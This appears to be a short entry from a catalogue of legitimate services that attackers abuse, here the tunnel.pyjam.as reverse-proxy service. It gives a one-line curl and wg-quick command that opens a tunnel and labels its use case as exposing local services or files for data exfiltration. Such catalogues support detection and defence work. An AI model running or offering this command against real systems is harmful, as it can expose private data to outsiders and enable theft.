.. /Pyjam.as
Star

Exfiltration

tunnel.pyjam.as can be used as an ephemeral reverse proxy for your local services. This may be useful, for instance when you need to show your friend something cool you’ve built.

Paths:

Resources:

Acknowledgements:

Detections:

Exfiltration

  1. Create tunnel through public service

    curl https://tunnel.pyjam.as/<PORT> > <CONFIG> && wg-quick up ./<CONFIG>
    Use case
    Exposing local services/file system over the internet for data exfiltration.
    Privileges required
    User
    Operating systems
    Windows, Linux, MacOS